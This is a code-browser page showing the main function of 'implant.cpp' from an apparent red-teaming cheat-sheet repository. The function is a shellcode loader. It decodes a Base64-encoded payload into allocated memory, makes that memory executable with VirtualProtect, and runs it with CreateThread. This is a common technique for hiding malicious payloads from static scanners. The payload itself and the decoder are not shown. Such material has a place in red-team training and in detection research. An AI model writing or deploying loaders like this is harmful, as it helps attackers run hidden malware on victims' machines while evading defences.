MCPcopy Create free account
hub / github.com/0xJs/RedTeaming_CheatSheet / main

Function main

coding/projects/Encoding_Encryption/Base64/implant.cpp:27–50  ·  view source on GitHub ↗

Source from the content-addressed store, hash-verified

25
26
27int main(void) {
28
29 void * exec_mem;
30 BOOL rv;
31 HANDLE th;
32 DWORD oldprotect = 0;
33
34 // Allocate new memory buffer for payload
35 exec_mem = VirtualAlloc(0, len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
36
37 // Decode the payload back to binary form
38 DecodeBase64((const BYTE *)payl, len, (char *) exec_mem, len);
39
40 // Set the buffer executable
41 rv = VirtualProtect(exec_mem, len, PAGE_EXECUTE_READ, &oldprotect);
42
43 // Run the payload
44 if ( rv != 0 ) {
45 th = CreateThread(0, 0, (LPTHREAD_START_ROUTINE) exec_mem, 0, 0, 0);
46 WaitForSingleObject(th, -1);
47 }
48
49 return 0;
50}

Callers

nothing calls this directly

Calls 1

DecodeBase64Function · 0.85

Tested by

no test coverage detected